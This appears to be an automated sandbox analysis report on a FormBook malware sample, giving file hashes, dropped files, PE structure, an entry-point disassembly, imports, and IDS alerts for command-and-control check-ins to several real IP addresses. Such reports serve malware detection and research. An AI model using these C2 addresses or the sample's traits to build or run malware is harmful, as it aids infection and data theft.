                                                                                                                                                                          • 162.34.81.107
                                                                                                                                                                          r0000000NT_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 162.0.215.33
                                                                                                                                                                          ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 162.52.209.59
                                                                                                                                                                          No context
                                                                                                                                                                          No context
                                                                                                                                                                          Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                          Entropy (8bit):1.121297215059106
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\LlbpXphTu9.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):287232
                                                                                                                                                                          Entropy (8bit):7.992604141500029
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:6144:AfoecHIbOpsrARJftCPZY+oQ3uUZSm+0/ysomlJVPkY0U073D:AfKIbSsrStX4cmFVo2w
                                                                                                                                                                          MD5:8F59A031FFAF26EEB6207E3AD107E949
                                                                                                                                                                          SHA1:E8D846427C9F71205ECED4590F64E9453DB45CD1
                                                                                                                                                                          SHA-256:99634EEF2EF5E37DBD30FD9BA4CBFF42DBAEBB1E7F626B36E9C53BB934CD60C4
                                                                                                                                                                          SHA-512:D6551539015AFDE94DC27CB4300F73CFCE382CEAED5A6C8DBC7B4B0A0EBCA15104754B9CC89ED2967320D2451E5224C72B3626A87EB1BFED5B30F0F5BD455971
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:.ju..9NTK...Y...{.9M...7X...0GY9NTKX44PGP00GY9NTKX44PGP00G.9NTEG.:P.Y...Xu.u.0]Gp7"_W58Tn7*6Z[$g2U.5,Wn=%xp{.g=_T"w4C^oX44PGP0IFP.s4,..T7.mPW.C..q8S.J....'>.T...T7..YS/dY).KX44PGP0`.Y9.UJX..?.P00GY9NT.X65[F[00.]9NTKX44PG.$0GY)NTK804PG.00WY9NVKX24PGP00G_9NTKX44P'T00EY9NTKX64..P0 GY)NTKX$4PWP00GY9^TKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44~35HDGY9..OX4$PGP`4GY)NTKX44PGP00GY9nTK844PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9NTKX44PGP00GY9
                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Entropy (8bit):7.508515773945212
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                                                                                                          • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                          File name:LlbpXphTu9.exe
                                                                                                                                                                          File size:1'322'495 bytes
                                                                                                                                                                          MD5:1bce82ea786776f80c8ccb92ad160ede
                                                                                                                                                                          SHA1:1f8e6d65135c31b7560ccef0d150ebee8349e7cd
                                                                                                                                                                          SHA256:8e868ef64afa97906f7c442a93cadf7b58939b4960863c6d7ea2dcf85faf06fa
                                                                                                                                                                          SHA512:badb2c4e9b7530590d95519ec06abc1f3f978f7432992b35da7e3b8f59aeb75a7f3121ca64b877d569243aeb883bc98b660eb9f0d3ae5bef2005f558948fd1eb
                                                                                                                                                                          SSDEEP:24576:ffmMv6Ckr7Mny5QL3JJPTs/FMxyogj8BumnNhoC3D:f3v+7/5QL3g/ysz8gqoC3D
                                                                                                                                                                          TLSH:A555F112B7D680B6DDA33971193BE32BEB3575194327C4CBA7E01E778E211409B3A762
                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
                                                                                                                                                                          Icon Hash:1733312925935517
                                                                                                                                                                          Entrypoint:0x416310
                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                          Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                          File Version Major:5
                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                          Import Hash:aaaa8913c89c8aa4a5d93f06853894da
                                                                                                                                                                          Instruction
                                                                                                                                                                          call 00007F3448CEE94Ch
                                                                                                                                                                          jmp 00007F3448CE271Eh
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          push ebp
                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                          push edi
                                                                                                                                                                          push esi
                                                                                                                                                                          mov esi, dword ptr [ebp+0Ch]
                                                                                                                                                                          mov ecx, dword ptr [ebp+10h]
                                                                                                                                                                          mov edi, dword ptr [ebp+08h]
                                                                                                                                                                          mov eax, ecx
                                                                                                                                                                          mov edx, ecx
                                                                                                                                                                          add eax, esi
                                                                                                                                                                          cmp edi, esi
                                                                                                                                                                          jbe 00007F3448CE28AAh
                                                                                                                                                                          cmp edi, eax
                                                                                                                                                                          jc 00007F3448CE2A4Ah
                                                                                                                                                                          cmp ecx, 00000100h
                                                                                                                                                                          jc 00007F3448CE28C1h
                                                                                                                                                                          cmp dword ptr [004A94E0h], 00000000h
                                                                                                                                                                          je 00007F3448CE28B8h
                                                                                                                                                                          push edi
                                                                                                                                                                          push esi
                                                                                                                                                                          and edi, 0Fh
                                                                                                                                                                          and esi, 0Fh
                                                                                                                                                                          cmp edi, esi
                                                                                                                                                                          pop esi
                                                                                                                                                                          pop edi
                                                                                                                                                                          jne 00007F3448CE28AAh
                                                                                                                                                                          pop esi
                                                                                                                                                                          pop edi
                                                                                                                                                                          pop ebp
                                                                                                                                                                          jmp 00007F3448CE2D0Ah
                                                                                                                                                                          test edi, 00000003h
                                                                                                                                                                          jne 00007F3448CE28B7h
                                                                                                                                                                          shr ecx, 02h
                                                                                                                                                                          and edx, 03h
                                                                                                                                                                          cmp ecx, 08h
                                                                                                                                                                          jc 00007F3448CE28CCh
                                                                                                                                                                          rep movsd
                                                                                                                                                                          jmp dword ptr [00416494h+edx*4]
                                                                                                                                                                          nop
                                                                                                                                                                          mov eax, edi
                                                                                                                                                                          mov edx, 00000003h
                                                                                                                                                                          sub ecx, 04h
                                                                                                                                                                          jc 00007F3448CE28AEh
                                                                                                                                                                          and eax, 03h
                                                                                                                                                                          add ecx, eax
                                                                                                                                                                          jmp dword ptr [004163A8h+eax*4]
                                                                                                                                                                          jmp dword ptr [004164A4h+ecx*4]
                                                                                                                                                                          nop
                                                                                                                                                                          jmp dword ptr [00416428h+ecx*4]
                                                                                                                                                                          nop
                                                                                                                                                                          mov eax, E4004163h
                                                                                                                                                                          arpl word ptr [ecx+00h], ax
                                                                                                                                                                          or byte ptr [ecx+eax*2+00h], ah
                                                                                                                                                                          and edx, ecx
                                                                                                                                                                          mov al, byte ptr [esi]
                                                                                                                                                                          mov byte ptr [edi], al
                                                                                                                                                                          mov al, byte ptr [esi+01h]
                                                                                                                                                                          mov byte ptr [edi+01h], al
                                                                                                                                                                          mov al, byte ptr [esi+02h]
                                                                                                                                                                          shr ecx, 02h
                                                                                                                                                                          mov byte ptr [edi+02h], al
                                                                                                                                                                          add esi, 03h
                                                                                                                                                                          add edi, 03h
                                                                                                                                                                          cmp ecx, 08h
                                                                                                                                                                          jc 00007F3448CE286Eh
                                                                                                                                                                          Programming Language:
                                                                                                                                                                          • [ASM] VS2008 SP1 build 30729
                                                                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                          • [C++] VS2008 SP1 build 30729
                                                                                                                                                                          • [ C ] VS2005 build 50727
                                                                                                                                                                          • [IMP] VS2005 build 50727
                                                                                                                                                                          • [ASM] VS2008 build 21022
                                                                                                                                                                          • [RES] VS2008 build 21022
                                                                                                                                                                          • [LNK] VS2008 SP1 build 30729
                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                          .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                          RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                                                          RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                                                          RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                                          RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                                                                          RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                                                                          RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                                                                          RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                                                                                          RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                                                                                          RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                                                                          RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                                                                          RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                                                                          RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                                                                          RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                                                                          RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                                                                          RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                                                                          RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                                                                          RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                                                                                                                                          RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                                          RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                                          RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                                                                                                                                          RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                                                                          RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                                                                          RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                                                                                                                                          RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                                                                                                                                          RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                                                                                                                                          RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                                                                          RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                                                                                                                                          DLLImport
                                                                                                                                                                          WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                                                                          VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                          COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                                                                          MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                                                                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                                                                          PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                                                                          USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                                                                          KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                                                                                                                                          USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                                                                                                                          GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                                                                                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                          ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                                                                                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                                          ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                                                                                                                                          OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                          EnglishGreat Britain
                                                                                                                                                                          EnglishUnited States
                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                          2024-10-23T17:13:07.602346+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549915142.250.186.11580TCP
                                                                                                                                                                          2024-10-23T17:13:10.151277+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549931142.250.186.11580TCP
                                                                                                                                                                          2024-10-23T17:13:12.693150+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549939142.250.186.11580TCP
                                                                                                                                                                          2024-10-23T17:13:21.315478+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549982142.250.184.21180TCP
                                                                                                                                                                          2024-10-23T17:13:23.849010+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549983142.250.184.21180TCP
                                                                                                                                                                          2024-10-23T17:13:26.391997+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549984142.250.184.21180TCP
                                                                                                                                                                          2024-10-23T17:13:35.021189+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549986217.160.0.13280TCP
                                                                                                                                                                          2024-10-23T17:13:37.583735+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549987217.160.0.13280TCP
                                                                                                                                                                          2024-10-23T17:13:40.130572+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549988217.160.0.13280TCP
                                                                                                                                                                          2024-10-23T17:13:48.552967+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549990162.0.211.14380TCP
                                                                                                                                                                          2024-10-23T17:13:51.090205+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549991162.0.211.14380TCP
                                                                                                                                                                          2024-10-23T17:13:53.642795+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549992162.0.211.14380TCP
                                                                                                                                                                          2024-10-23T17:14:02.022592+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499943.33.130.19080TCP
                                                                                                                                                                          2024-10-23T17:14:04.567924+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499953.33.130.19080TCP
                                                                                                                                                                          2024-10-23T17:14:08.021119+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499963.33.130.19080TCP
                                                                                                                                                                          2024-10-23T17:14:16.255448+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499983.33.130.19080TCP
                                                                                                                                                                          2024-10-23T17:14:17.920158+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499993.33.130.19080TCP
                                                                                                                                                                          2024-10-23T17:14:20.521644+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500003.33.130.19080TCP
                                                                                                                                                                          2024-10-23T17:14:30.850507+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550002206.238.184.16880TCP
